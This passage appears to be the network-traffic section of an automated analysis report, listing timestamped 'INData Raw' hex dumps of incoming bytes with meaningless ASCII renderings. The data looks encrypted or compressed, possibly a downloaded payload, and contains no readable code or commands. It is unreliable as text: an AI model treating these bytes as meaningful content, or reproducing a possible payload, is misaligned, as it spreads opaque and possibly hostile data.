                                                                                                                  2023-08-29 17:16:42 UTC1392INData Raw: 8c 8a e9 d0 ad 6d 08 10 45 7a d9 19 8d 4a 9a 3c 5d 09 4a 59 08 b1 f1 62 75 53 2a d0 9e 72 da a5 42 7b d9 39 47 a0 39 dd 13 1e 94 9d b1 18 99 5b 8d c1 44 2f ad 33 a9 d5 45 c2 54 28 ce b9 94 95 b5 c1 49 38 ca 98 19 d8 ce 19 18 fb 45 68 44 3c ce 77 92 a6 41 49 32 11 46 0c 09 e9 18 41 59 af 41 cc d9 ad 66 79 19 d4 45 7a d9 3b 47 c2 c1 eb 18 49 11 ae 42 c2 54 d8 6e 82 1d d3 84 99 10 d9 6e b1 30 95 45 41 df 95 ba 48 92 8d 49 49 92 13 6e 8b 1a 95 51 cc 1b 0b 0f 4a 1a 59 00 a5 20 8d 07 a5 49 d3 8e 62 54 3c 17 4a 11 c0 6e b9 32 08 04 4a 99 ad ba 09 19 a4 77 a1 ac 0b a7 41 ee b0 9a 1e f1 e2 3c a9 2d 70 45 97 91 86 ad 22 b9 d0 ba 3c 0d 00 45 4c e9 fa 16 f8 30 19 51 b7 e6 38 41 59 ed 11 47 bd 9c 19 1a 17 39 a4 40 a1 3a 8e 95 59 54 20 51 cc d0 60 45 5e a9 d0 cf 0c e6
                                                                                                                  Data Ascii: mEzJ<]JYbuS*rB{9G9[D/3ET(I8EhD<wAI2FAYAfyEz;GIBTnn0EAHIInQJY IbT<Jn2JwA<-pE"<EL0Q8AYG9@:YT Q`E^
                                                                                                                  2023-08-29 17:16:42 UTC1396INData Raw: 7b b6 19 a5 91 c2 d7 87 ba 3c 15 d0 ad 47 6c 2e ba b6 6c c8 45 c4 54 70 ba 3c 0d 2f 30 49 09 81 ce 81 f1 c2 bf b4 19 2f ce 0c b9 e9 00 f9 64 d0 46 c0 5c 60 ce 0c bd e9 41 0c ad d1 6d fd 5e eb 38 95 19 a2 87 70 47 e4 cc 14 f5 d0 cc 14 e1 a4 74 70 47 e0 45 c0 44 c8 33 68 2a 2f ce 49 5f e4 ce 0d 21 c0 7e 8a 19 a4 43 19 f1 ed 0f b2 e6 d0 ba 0c 01 5b 00 51 9a 17 45 51 22 96 75 3b f8 2f 33 41 2d 38 62 49 33 ba 5d c0 47 d0 75 a1 c4 a9 b8 b6 22 13 45 c0 5f e4 30 57 92 9d 89 4d f1 fd 45 51 92 dd 49 69 25 d0 35 c2 5c d8 cc 41 92 dd c7 59 19 da ac 56 1c d0 45 49 8d d4 c8 0c 19 4a 55 c2 d7 80 cc 59 44 10 ad 6c 19 87 7c 14 c5 d1 45 3a 90 8d b9 c0 44 68 cc 49 44 00 cc 14 fd df c3 d4 1b d4 45 62 5f e0 ce 0f 29 53 45 b1 18 a6 6f 22 d9 c8 15 40 18 a1 08 d7 19 19 95 cc cb
                                                                                                                  Data Ascii: {<Gl.lETp</0I/dF\`Am^8pGtpGED3h*/I_!~C[QEQ"u;/3A-8bI3]Gu"E_0WMEQIi%5\AYVEIJUYDl|E:DhIDEb_)SEo"@
                                                                                                                  2023-08-29 17:16:42 UTC1400INData Raw: 50 69 1a 3b 55 e9 18 d2 50 4e 3a d0 44 28 0d 5b 00 a5 b9 e0 a1 c0 1c f1 22 c0 f9 d1 7c 16 09 a4 67 00 39 b5 ce 06 f8 fc ce 48 39 dc 16 49 e6 80 7d 72 da a4 49 19 11 2f 32 59 79 de ad be 44 2e 45 b6 20 8d 8d 3c 56 e9 18 49 ed a5 01 c2 64 3c 7e b2 19 ae 78 ca 64 24 45 3c 2e 98 ba 3c f9 b0 36 06 4e 51 57 ca 13 b0 c5 5b e9 f0 65 51 a8 2d ba e9 22 95 bd 3c 0c 11 4f 4f b8 da 54 a9 76 c0 2f 49 d9 da cc 0c ed d0 c0 b6 66 13 ce 0c ed 59 41 0c d1 10 23 c0 5c 28 ac b9 4c 72 57 b9 58 d9 8a cb 25 ea 47 40 22 e0 32 59 6d 81 6f 41 f8 c2 ce b1 09 55 ba 3d 2c 50 49 fa a9 2d 45 b6 99 ad 4a 49 92 08 30 49 1c eb 18 b5 6d e6 7e 14 19 28 30 4c 90 ad b1 a2 0b c4 12 1f b8 c6 04 e9 0f 55 85 3c 39 4a 83 0c 16 d1 44 4d 88 5b c5 34 f1 e3 9e b6 5c 20 25 44 38 d0 65 3b 95 39 44 69 85
                                                                                                                  Data Ascii: Pi;UPN:D(["|g9H9I}rI/2YyD.E <VId<~xd$E<.<6NQW[eQ-"<OOTv/IfYA#\(LrWX%G@"2YmoAU=,PI-EJI0Im~(0LU<9JDM[4\ %D8e;9Di
                                                                                                                  2023-08-29 17:16:42 UTC1404INData Raw: 44 c4 4d d0 57 48 94 ac d3 75 1a cf 55 c4 4d 56 1d 89 8d d3 47 c0 11 85 b5 19 b9 c4 16 c4 5c 24 55 19 f1 43 97 88 b0 24 7c 4e 1c 30 58 4e f9 0f ce 0c e9 e9 4d 48 79 d1 4d c2 19 fb 5a 60 5c d6 a9 09 06 d2 59 d2 94 9e 71 ca 59 f1 45 ca 7f e8 45 c9 02 5b 4f 99 18 58 5d e8 08 ba 42 12 92 58 7f 48 21 90 02 02 6c 26 25 9d 39 2f 08 51 6c 3b e5 68 20 d1 41 12 67 61 36 0c 0d e9 03 71 99 ae 46 c0 5f e8 ce 58 d9 e6 45 c2 50 d4 1a 8f 5f dc 45 a9 90 c0 cc 01 1d 60 5a 40 20 30 44 49 9a 28 4d 3e 1e 5b 10 45 99 59 11 c8 09 8d 87 41 d1 d1 41 1a 4f c1 c5 59 4e 5b 38 45 19 5b 9c 3f 0e 5b 49 fe 48 d0 ad 15 84 2d ba 19 92 1b c9 a1 a7 f0 1e f9 5d c0 37 a0 69 f7 4d c2 d2 87 34 6e d3 9d bb b6 a9 8f 1b 12 44 0a 60 02 1d c8 05 4d 49 ba 45 a1 0f 84 41 31 4c d4 ad 54 4e d4 a6 a9 20
                                                                                                                  Data Ascii: DMWHuUMVG\$UC$|N0XNMHyMZ`\YqYEE[OX]BXH!l&%9/Ql;h Aga6qF_XEP_E`Z@ 0DI(M>[EYAAOYN[8E[?[IH-]7iM4nD`MIEA1LTN
                                                                                                                  2023-08-29 17:16:42 UTC1408INData Raw: 95 fb 36 20 ce 02 29 60 44 51 18 9d 99 c9 18 00 54 b9 16 52 47 e1 6b e5 91 a1 ef de be b6 3a 72 20 90 4d 81 14 1a a9 56 38 41 18 70 43 ca 3e d0 c6 2e 1d d0 45 c2 e8 16 03 45 18 38 e2 48 58 d7 9d 1a 92 1e ad aa e5 d4 ba b6 69 d0 cc 0c 11 38 40 e8 c9 f1 c6 34 11 d0 b7 56 90 c0 0b 29 9c 10 4a cd 98 a0 45 cd 64 ba 85 49 e6 a6 69 a1 fc e0 69 ad 9a c1 44 48 29 38 91 49 18 53 81 51 91 53 3b 7d 49 cc 5d c4 5c e0 59 09 15 5b 8b 1a 6d cc 85 48 e6 dc 33 61 29 de 54 65 6f fc ba 3f ff f4 15 d0 99 df 2f 48 89 fd bd 49 60 d2 59 23 19 b0 3b 79 37 92 0f c0 5e d4 31 c0 16 20 4f 49 18 4c b9 8c 2d 74 c6 6d e0 d2 55 ed 6c c2 53 eb 73 d1 54 3a ba 97 3b 70 48 b6 75 1a 4e d1 64 68 c6 df ea 97 50 e3 97 49 50 53 85 41 5b 93 7e 82 19 a5 4c 7a cb e9 11 c1 e5 d0 4a dc db 5d 18 b5 4a
                                                                                                                  Data Ascii: 6 )`DQTRGk:r MV8ApC>.EE8HXi8@4V)JEdIiiDH)8ISQS;}I]\Y[mH3a)Teo?/HI`Y#;y7^1 OIL-tmUlSsT:;pHuNdhPIPSA[~LzJ]J
                                                                                                                  2023-08-29 17:16:42 UTC1412INData Raw: 94 49 e1 5d 3d 48 94 d4 7a 19 3d 38 fa 49 27 55 85 49 0e a5 49 48 9e ee ae 20 4a 87 15 a1 f8 d0 62 b4 e6 3b ee c2 64 2c 45 b6 2a 5b 42 c2 d6 2f 15 49 15 55 85 3c 10 2f 76 21 d9 78 3f 79 69 3b 04 ca 01 11 4b 49 11 a4 c0 88 f9 d2 15 c2 11 1f ad 38 5d c3 49 3d ab 5b 45 07 11 11 a4 4b 48 2f 36 49 11 80 ad a4 a2 d2 45 ca 19 14 49 a0 42 2f ba b6 71 90 e5 54 29 a0 2d 35 99 c0 ad 4d 99 dc 85 12 54 2c 13 a1 17 d1 c5 44 4f 38 69 b1 e3 2f 76 51 d9 39 7d 49 10 57 0a 7a d9 e9 45 0c 15 83 ce 90 16 54 c2 48 19 e9 7c 0c 09 86 4a dc d9 f0 12 c4 1d 55 55 c9 1a 5b bd 59 4e 38 e0 b4 5a 9f 31 75 4e f0 2f 49 4f 38 1b c9 03 5b 00 4b 11 90 5e 8f 1f d1 83 0f 18 56 44 45 26 96 7b c2 d2 38 b5 c9 17 bd 86 77 17 17 7b c9 7c ce 85 3f d8 ef 63 40 59 57 00 45 d9 e7 ce 0c 09 55 45 89 6d
                                                                                                                  Data Ascii: I]=Hz=8I'UIIH Jb;d,E*[B/IU</v!x?yi;KI8]I=[EKH/6IEIB/qT)-5MT,DO8i/vQ9}IWzETH|JUU[YN8Z1uN/IO8[K^VDE&{8w{|?c@YWEUEm
                                                                                                                  2023-08-29 17:16:42 UTC1416INData Raw: e1 41 f8 d2 1a 49 11 b1 45 c8 1e 03 50 b8 00 65 14 4b e6 6e f0 e8 1a e3 4c 19 11 a4 4b 78 10 28 45 7a 2f 21 4a 5e 1d c7 7c a9 1e 95 53 59 5a dd 05 5f 8b 40 4d 5b 37 5b 0d 6d 22 f0 8b 46 9d 81 4f c9 7f 67 16 4a e9 f0 61 50 92 d1 17 b6 49 c0 11 a0 73 ac 47 60 68 d2 f3 3d 1b 86 d5 1b 16 67 d6 88 10 3b 94 70 1b 96 40 79 1b a3 53 8f 9c fc f6 59 3d 2f 44 46 88 df b4 49 4c c7 04 48 b9 de 24 49 68 d4 58 08 3c 65 b4 48 7a d5 c5 4e 4b df f3 37 8a b1 4b da 0e 82 44 99 17 b2 72 b0 1f 71 83 40 aa db 67 42 15 39 f2 68 65 36 44 49 6c 35 2d e9 04 e0 35 21 ab e4 95 34 f0 99 d5 4b 80 d3 36 dd 1a f3 87 45 fb d3 5d a0 61 3a 46 46 9d 06 0a 79 1b 05 49 79 ca dc 05 9c 15 21 45 b6 cc dc 04 48 c9 dc 24 49 cf dc b4 48 c1 dc 35 49 3c 51 72 df f0 d5 b9 41 d1 db 59 a0 0f 2a a5 47 f0
                                                                                                                  Data Ascii: AIEPeKnLKx(Ez/!J^|SYZ_@M[7[m"FOgJaPIsG`h=g;p@ySY=/DFILH$IhX<eHzNK7KDrq@gB9he6DIl5-5!4K6E]a:FFyIy!EH$IH5I<QrAY*G
                                                                                                                  2023-08-29 17:16:42 UTC1420INData Raw: c5 48 a7 85 c5 48 d1 50 44 9b 99 d1 99 c9 18 36 50 c9 18 20 c5 48 e3 50 44 4d 76 e6 11 39 17 50 44 51 99 d1 67 c9 18 fc 10 c9 18 e6 c5 48 59 50 44 03 99 d1 11 1c 99 d1 1b c9 18 b8 c5 48 6b 50 44 35 4c 50 44 cf 99 d1 d5 c9 18 4a c5 48 bd 85 c5 48 b7 50 44 f1 99 d1 87 c9 18 1c 10 c9 18 06 c5 48 f9 50 44 a3 99 d1 b1 4c 99 d1 bb c9 18 d8 35 7f 69 c2 10 c9 18 cc 85 49 3f 10 45 79 d9 d0 7f 1c d9 d0 01 89 19 9e 85 49 41 10 45 2b 4c 10 45 25 d9 d0 33 89 19 50 85 49 93 85 85 49 bc 10 45 8e d9 d0 9e 89 19 3c 40 89 19 21 85 49 03 bc 73 39 1a a0 34 7f 69 58 85 66 d8 d2 80 48 8e 11 85 48 6b bd 73 39 30 10 43 8c 19 d2 89 48 19 5b ba 1c 92 3c 14 49 f1 e7 b9 49 19 55 85 35 09 cf ad 20 2a d2 47 5f f1 af 47 fb 1b d2 48 c4 54 2f ad 7c 1d 25 45 89 56 90 ae 4b 2a 10 46 08 49
                                                                                                                  Data Ascii: HHPD6P HPDMv9PDQgHYPDHkPD5LPDJHHPDHPDL5iI?EyIAE+LE%3PIIE<@!Is94iXfHHks90CH[<IIU5 *G_GHT/|%EVK*FI
                                                                                                                  2023-08-29 17:16:42 UTC1424INData Raw: a7 41 c9 70 42 a4 11 de a4 41 46 ce 79 a7 eb 89 5b 08 8e 81 5b 5d 07 98 09 0c 0e ce d3 e8 1c 17 ad 3c b6 d5 ad 2d aa bf fd 5f a2 da f5 40 11 c7 c8 42 1d d6 a6 79 37 37 4b c2 c8 51 a7 4b 05 b0 e8 72 c8 a5 a6 c2 c8 d0 84 a3 11 26 87 48 6c de e0 89 3c c0 e4 4e f6 9b 25 04 c2 26 2a 78 d8 d7 86 a1 e1 50 43 8f 1e dc fd 45 16 88 b4 26 d8 d7 bc c0 64 20 ee d9 0f 51 7d a1 7b c6 ad d8 21 c2 e6 4e 17 da d7 5f 8b 5b 25 d2 22 1b 31 a6 19 5b 04 45 92 00 c4 ab 06 d2 46 99 1e 00 30 a9 20 89 55 79 6d 0b 7c 17 89 b3 16 5f 79 27 43 0e 59 54 15 17 1d 78 44 3c db d0 ce 08 09 5b 7d c2 69 d8 85 c2 40 dc ce 19 1d 70 12 29 97 d0 94 a2 32 27 6e 8b ef 13 45 48 6d dc c0 bf 64 d2 76 41 ef 55 85 19 19 10 ce 14 11 d8 84 a2 11 b2 44 c8 78 dc ba 0b e7 e0 c1 38 15 3b 46 69 9a 5b 45 04 e9
                                                                                                                  Data Ascii: ApBAFy[[]<-_@By77KQKr&Hl<N%&*xPCE&d Q}{!N_[%"1[EF0 Uym|_y'CYTxD<[}i@p)2'nEHmdvAUDx8;Fi[E
                                                                                                                  2023-08-29 17:16:42 UTC1428INData Raw: cd 8e 1f d1 4d 8f 9a b6 79 49 de 96 05 59 1e d0 45 cb 90 e1 12 c2 e0 d4 c8 fe 19 e1 45 c2 1f 55 85 49 66 f6 ba 7c 45 0e 7e 39 09 2f 50 f5 0b d0 00 59 73 84 51 21 19 d0 98 1e 99 07 ba 1b 15 d1 c4 59 6c d4 76 b6 f2 ce 0d 49 73 84 cc 4f 92 ec c2 23 09 d0 12 a1 32 d0 fd ca dd dc 10 49 8e d7 c5 c5 61 51 0a 8e 5e f4 10 49 92 3c 16 c2 44 d8 c0 92 39 a4 52 2f ee 93 44 1f 13 68 05 1e 19 d7 c5 a0 ae d0 0f c2 99 93 55 a2 1c 38 4a 97 99 dc 15 09 5d 5b 0d c9 2a bb c4 46 e9 90 c0 bf 6c da fd 47 58 d9 d5 4a 59 d9 07 d8 19 d4 12 b6 6c c4 c5 c2 d7 2f 30 45 f1 2f c5 19 19 5b bd 7a d9 eb bd 34 10 d4 ce 4f d9 d4 15 41 f2 b7 ce 49 54 dc 7c 48 6c c2 ce 07 19 90 c4 a8 e6 3f ba b6 98 d2 8c 49 14 d2 cc 07 59 eb 9d 49 6d 95 b3 0a 59 d1 30 4d 19 53 23 09 e7 ba 46 19 49 02 16 49 49
                                                                                                                  Data Ascii: MyIYEEUIf|E~9/PYsQ!YlvIsO#2IaQ^I<D9R/DhU8J][*FlGXJYl/0E/[z4OAIT|Hl?IYImY0MS#FIII
                                                                                                                  2023-08-29 17:16:42 UTC1432INData Raw: 49 9a 79 d3 e5 2a 0d 11 05 4a 02 30 1a 29 16 dd 95 43 21 10 44 f8 10 f5 b7 b6 e1 cc 3a 4c e8 f7 09 4d 89 c8 30 59 9c d8 b3 c2 c0 a0 30 4a 59 d0 c5 5d f2 b6 24 4a 26 e3 40 42 92 db 4c e9 11 59 43 69 1c 9f ce 7c a5 d0 57 79 69 87 ba 7c 45 0e 45 72 69 2f 93 c2 09 ba 44 4c 48 d6 8d 99 60 5b bd cc e6 a4 81 61 4e 31 4d 82 f1 16 25 38 c9 f8 17 40 d9 cb cc 71 99 d3 50 5e 1a 87 18 98 1b c0 17 79 eb 8b 0c 68 4f 32 46 b8 15 38 80 a9 1a 21 41 35 30 53 38 68 c9 93 5e c2 1f 83 46 4d 92 cc cd b1 e6 c5 64 41 92 c0 16 3b 1d 84 1e 1e c9 cc c3 a9 1b 8f 6d 44 58 90 05 6c 11 41 05 49 38 df 05 88 fd a2 04 09 d8 38 43 d9 59 08 36 4c f8 57 51 59 31 95 4d 01 6d d7 4d 01 6c d9 25 43 2a 55 3b 09 dd a5 6e 09 12 5d 49 79 79 a5 55 45 19 f1 ce 07 29 3b 4d cc 60 d0 05 3d f9 5b 0c 7d 9c
                                                                                                                  Data Ascii: Iy*J0)C!D:LM0Y0JY]$J&@BLYCi|Wyi|EEri/DLH`[aN1M%8@qP^yhO2F8!A50S8h^FMdA;mDXlAI88CY6LWQY1MmMl%C*U;n]IyyUE);M`=[}
                                                                                                                  2023-08-29 17:16:42 UTC1436INData Raw: d0 87 1e f3 dd b9 d3 15 41 a1 b4 c0 6c cb 1a c4 45 4b 69 80 31 89 47 a4 61 a1 5d ad 84 da 49 e3 85 19 6a d2 8b 05 f1 f1 05 71 86 80 ae 63 88 f1 ad 23 54 23 47 50 ad d2 48 08 a9 6d 47 aa 26 34 4c fb 10 b1 17 08 4a e0 8b 29 10 8c ce 4b 1e e1 8e 19 15 53 38 81 19 d0 83 0c 11 2f 83 0c e5 d0 cd 3d 2b b6 54 4a 99 a4 58 9a 33 d2 4d 6b 09 5b 00 e1 e6 a0 41 e8 29 06 16 a1 e4 3f c5 35 14 f0 49 49 68 20 ba b6 93 90 49 c1 32 50 46 29 1c d7 44 10 d6 c0 7e 19 09 94 ae 4a 99 df c6 34 f9 a0 5c b6 2d a5 bd 4d 16 d3 e5 5a 9b d1 76 92 19 eb be 3d 5f eb b6 3c 0f 48 ce 4e 4a 32 42 39 19 b8 ba d9 09 d5 97 49 09 63 57 5d 20 8d 8d 3d 29 df 12 a1 06 00 43 d9 34 b0 fe 48 d9 55 4f 70 44 4c 31 4c f1 d6 49 68 18 a2 53 59 47 8b 1a 80 18 8f f9 09 4e 5b bd 88 fe ce 05 88 e6 cf b3 0c 15
                                                                                                                  Data Ascii: AlEKi1Ga]Ijqc#T#GPHmG&4LJ)KS8/=+TJX3Mk[A)?5IIh I2PF)D~J4\-MZv=_<HNJ2B9IcW] =)C4HUOpDL1LIhSYGN[
                                                                                                                  2023-08-29 17:16:42 UTC1440INData Raw: 04 79 58 8c c8 04 f5 81 c8 49 51 d8 ad ef d5 2f ba 16 11 19 87 41 da 77 ac 84 a5 2f 47 b6 90 c8 55 1a 4f 5b b4 c2 19 96 1d 7a 5c dc c4 07 59 c6 05 89 65 d1 54 59 59 7c 74 0f 41 d8 ad 5e 86 10 52 91 9c 0b 39 49 21 87 ce 34 11 86 ce 86 59 59 3b 1d f1 d9 49 49 79 d7 45 c4 54 20 14 c2 d6 2f 15 4b 01 90 07 62 5c 24 2f 47 49 d0 ce 0c e1 fb 00 b9 92 1e 67 19 18 f2 ad bb e5 50 4b 8a 46 9e 1b 89 2f 16 83 c9 03 38 b4 49 39 5b 85 87 47 39 8b 3b 19 58 89 49 97 d0 76 9b 5b 54 15 4d 4a 86 45 3d 11 5b 34 3d 3a 22 cc 49 69 d8 ce 39 1d 5b 9b 98 19 3b c1 93 6d d8 12 c2 60 d0 3d c0 61 dc 1a c2 c7 11 45 a2 1b 8e c1 93 42 a4 4c 41 92 59 c1 48 5a 98 5d 14 db f2 41 0a 0b 38 02 d5 d9 c6 05 0d 7c 50 45 8a 5e db 14 18 99 db e5 55 29 d1 65 61 2a 19 04 cc ef 87 ce 49 21 59 08 b1 a1
                                                                                                                  Data Ascii: yXIQ/Aw/GUO[z\YeTYY|tA^R9I!4YY;IIyET /Kb\$/GIgPKF/8I9[G9;XIv[TMJE=[4=:"Ii9[;m`=aEBLAYHZ]A8|PE^U)ea*I!Y
                                                                                                                  2023-08-29 17:16:42 UTC1444INData Raw: 9b b8 c7 2a 9d a8 c1 9d 45 59 c0 95 51 97 d3 0e 84 89 c0 8d 4d 90 5c d8 2e 04 d9 d3 5c 58 1c 88 41 d7 6d 44 44 0c 09 0d 01 14 e9 d0 41 94 44 38 35 4e c4 d0 40 79 31 e0 35 91 c3 0f 67 a9 0a d8 b3 8d 58 90 4d 3c 3c 54 99 89 98 d8 8c a1 b6 d7 3a 41 18 a0 4d 95 d9 0e bf a2 32 09 2d a1 c7 31 c0 4b 9f 5f 47 cc 1b 09 45 89 c7 32 9d a8 c5 9d b5 e9 c0 19 99 04 f1 b1 4e 45 a9 d8 04 2e 12 11 82 09 0d 74 05 4a 9a d0 25 61 e5 e3 8c 8e 19 24 4e f9 19 f0 44 9d 79 d0 cc 01 01 59 45 01 05 59 0d 69 90 98 61 4e 8f 40 f5 64 d9 bb ba 90 f7 53 23 49 2d d0 9c 1f 35 53 23 71 19 d0 9c 17 29 17 43 7d b1 61 c5 4a 5f c4 51 29 19 5f d2 18 a9 e7 e8 ac 29 4b 05 38 94 47 12 79 1b a1 27 4c 0d 09 13 f9 1d a4 05 4d c0 8e 71 4c f9 d4 11 d9 19 e3 85 c4 67 e8 c1 e2 b2 b1 45 09 b2 7b 1a 96 1c
                                                                                                                  Data Ascii: *EYQM\.\XAmDDAD85N@y15gXM<<T:AM2-1K_GE2NE.tJ%a$NDyYEYiaN@dS#I-5S#q)C}aJ_Q)_)K8Gy'LMqLgE{
                                                                                                                  2023-08-29 17:16:42 UTC1448INData Raw: 64 06 90 93 51 0c 59 c5 50 c8 8b 3b 3d e8 b8 5e ce 6d 57 fc 49 d5 30 9b 64 4c 92 95 cd b5 64 d3 25 54 73 d2 15 09 02 e0 ce 82 f1 5e 25 68 b9 41 07 e8 5b 80 c7 04 31 ba 49 16 fd 9d cc e9 64 24 ad bd 53 90 37 01 fc d9 48 8f 1b 0d 85 4b 99 9c cc 0a 39 5b 45 0f 35 2f 06 55 90 93 61 69 2a 10 1a 17 42 5b 04 b6 2c d4 2d b9 39 d7 4c b6 2c bc 6d 7d 24 a0 a4 2d fa 30 43 46 30 84 60 2d 19 d0 40 60 26 34 54 60 f8 4b 25 0f 15 70 7a 87 1b 5b 48 e5 59 40 cc 1d 51 dc 37 4a ad a8 46 f1 61 d3 f5 50 77 d3 ba 08 39 65 c3 48 50 d4 30 49 14 2f 74 a1 d8 52 45 49 29 80 ad 67 9c 31 17 c3 11 09 ab 58 d9 d8 9c 11 01 40 4e 90 59 dc 45 90 f1 0e a4 91 51 c0 9c c9 59 c4 9d 01 15 0e 84 b9 1d d0 14 18 c0 91 4d 1f c5 dd 55 81 be e0 35 a9 5e 0d 18 b1 11 0d 00 b1 39 95 ad 17 f0 d1 45 49 c0
                                                                                                                  Data Ascii: dQYP;=^mWI0dLd%Ts^%hA[1Id$S7HK9[E5/Uai*B[,-9L,m}$-0CF0`-@`&4T`K%pz[HY@Q7JFaPw9eHP0I/tREI)g1X@NYEQYMU5^9EI
                                                                                                                  2023-08-29 17:16:42 UTC1452INData Raw: c6 36 25 d0 31 5a 73 d0 46 b6 6f d4 ad 01 9f d0 45 49 9c 10 31 4c 2a 10 05 69 f2 d2 76 89 4a d0 09 c0 5f c0 71 a1 57 ac 45 f9 c1 11 ae 49 1a 53 a6 48 ef 97 6d 48 19 a4 40 90 5e e4 ae 0a 9c d0 9e 3d 24 e3 85 c4 64 34 07 e2 18 d0 c8 0c fd 80 45 17 de d0 00 ad 0d d0 45 49 de 95 01 a1 1b d0 49 a1 b3 a5 44 eb 92 d0 38 41 6d c2 4a ff 5c 20 45 c0 5c 28 9e 0c e1 0c 70 49 f9 e8 75 39 f2 d2 9c a1 19 53 3b 7d 19 09 1b 65 16 dc c1 da 19 fc 45 06 02 ba 4d 23 13 d0 44 c0 7c d0 37 21 19 d8 45 43 19 d3 4b 1f 19 de 9c 0f 35 0c c7 44 18 e8 ad 9a d4 d1 45 4b a9 90 cd 0c e6 38 d1 cc 19 4c bd 09 9c 2f 31 08 a2 d8 45 66 4a e0 16 1e f1 f8 45 64 19 16 1c c3 b9 95 ba c1 5c 20 44 d1 4e dc d3 4b d7 d2 0e 3d 2e ba 44 1e f1 c2 16 4d 39 a5 81 49 4a 09 02 71 19 e3 85 90 47 e0 1e 16 47
                                                                                                                  Data Ascii: 6%1ZsFoEI1L*ivJ_qWEISHmH@^=$d4EEIID8AmJ\ E\(pIu9S;}eEM#D|7!ECK5DEK8L/1EfJEd\ DNK=.DM9IJqGG
                                                                                                                  2023-08-29 17:16:42 UTC1456INData Raw: 5f 49 c0 8d c7 45 d9 cb 9c 0c 15 0e 9c aa 09 10 40 ca d1 2f 18 8a 70 d2 46 52 2d 8d 86 a9 11 13 0f fe d9 ff c8 01 99 2f 7c 04 11 a4 67 62 99 dd 45 04 11 5b 53 22 d9 dc 2e 49 d0 dc c6 a1 15 d3 8f 19 19 5d 04 45 49 81 ba 5c c9 d0 56 79 69 53 81 45 e6 9e 4b 4d b9 d8 69 f2 79 d6 c6 a5 15 55 05 80 6d c8 e4 01 ed d1 de b1 51 5d 00 bd 19 4b b1 45 38 4a 49 d9 03 d0 45 80 ec d5 15 ba f7 d5 49 95 00 3d 40 e9 df d8 2e b6 15 c0 46 70 6d d8 04 fc bc 75 e0 65 47 8f ee 7a 18 1b 4d 4a d2 38 bb 4b c8 f0 03 6d e6 e5 19 97 22 f0 35 b6 0c 6c 57 a9 92 c0 ce 4b d6 30 5c 18 e6 e6 ce 81 e6 d2 17 a9 83 a4 4d c0 67 d8 cc 43 1f f0 5c 16 5e c9 2d a9 5c e7 45 39 73 dc ba 38 39 2f 34 19 05 2f 50 81 1b ce 55 21 3c 5b 45 08 39 55 85 36 1d 09 ab 69 f2 da ce 00 05 b0 61 90 5d cc 4d bd d8
                                                                                                                  Data Ascii: _IE@/pFR-/|gbE[S".I]EI\VyiSEKMiyUmQ]KE8JIEI=@.FpmueGzMJ8Km"5lWK0\MgC\^-\E9s89/4/PU!<[E9U6ia]M
                                                                                                                  2023-08-29 17:16:42 UTC1460INData Raw: b6 3c f7 3b 7f 6f 8a e4 cb 79 12 90 01 3b 2a 83 ba cd 4f f4 72 51 6e e9 18 b5 d9 d7 04 a8 22 3b 2e c2 5e f0 25 23 19 90 04 72 da a5 bc 18 a9 5f ad 43 69 81 6f b1 39 87 77 c2 6f f0 f1 c2 1f c0 1a 4a fd d1 05 18 e5 f1 47 d1 4a 38 da c8 c0 d0 0f 04 e1 f0 44 05 f1 92 b5 57 08 d3 38 5d 99 d5 31 6c e9 9d b9 c9 18 38 17 d8 49 17 ae 17 13 c1 20 6a 8c 82 71 a3 40 81 15 48 9c d0 97 1f 67 c4 c6 88 0d b6 e5 c2 28 b6 7e 3c 19 ac 05 59 37 a0 7e 8b 65 3f e5 7a 24 c4 e7 d4 f1 02 85 ab 0b ac 4d f8 7b d3 39 e0 6b d2 4d c8 f5 f0 05 67 b8 80 55 75 41 a0 76 8c 89 4f 17 d4 09 c3 66 bf 39 eb 83 c0 a4 38 75 47 90 55 f7 a5 48 d0 c8 a9 49 d0 80 05 2f b0 46 6e 79 f2 b5 3b 49 d2 f0 b1 e8 d1 f0 bd 18 80 45 3d 26 e9 32 5d 92 88 05 69 92 93 4d c0 9c b1 44 37 19 e7 ce 0e 09 5d 41 b9 9a
                                                                                                                  Data Ascii: <;oy;*OrQn";.^%#r_Cio9woJGJ8DW8]1l8I jq@Hg(~<Y7~e?z$M{9kMgUuAvOf98uGUHI/Fny;IE=&2]iMD7]A
                                                                                                                  2023-08-29 17:16:42 UTC1464INData Raw: ad d5 13 14 4f c9 64 ef c6 34 e1 d0 31 49 b0 c0 bd a1 4e 2d e5 46 7c 28 45 59 9a ad b1 49 f9 9e 30 bd f1 ee 87 69 12 10 dd 99 21 52 31 89 ab fd ce d9 64 3c ae 4e 59 c7 32 41 59 cf 34 69 0d a5 51 ca 3b d5 04 c3 50 d5 55 c9 90 e8 76 89 42 8f 1b 41 ac 57 e0 1c 1b 98 44 60 6d 98 ba c6 d8 98 f5 3c 59 83 13 2a 7a 13 24 f2 18 d9 63 3c 59 6a 46 42 1e 83 86 01 4e 38 83 ec 19 8a 25 c1 16 e9 70 cb 0a d1 46 58 b8 dd 1b 12 46 18 2b ca f5 e4 0c 49 77 c5 a1 49 98 73 7d 89 1d e3 65 89 94 ad ad e2 18 d0 2f 4b 19 88 cc 0c f5 59 00 b9 94 f0 00 b5 49 ba 44 88 28 17 00 6b f1 10 fe 49 f1 36 65 42 2a 26 65 72 df df c9 87 d9 d1 2d 01 88 b0 cc a1 f7 e2 25 02 df 73 04 90 b1 df c1 d5 d8 d2 1d 88 1b 07 86 4b 08 11 89 46 9d 55 85 4b 4f b8 b9 49 77 e7 35 23 1c 86 ad 2e 9f f7 07 4a 38
                                                                                                                  Data Ascii: Od41IN-F|(EYI0i!R1d<NY2AY4iQ;PUvBAWD`m<Y*z$c<YjFBN8%pFXF+IwIs}e/KYID(kI6eB*&er-%sKFUKOIw5#.J8
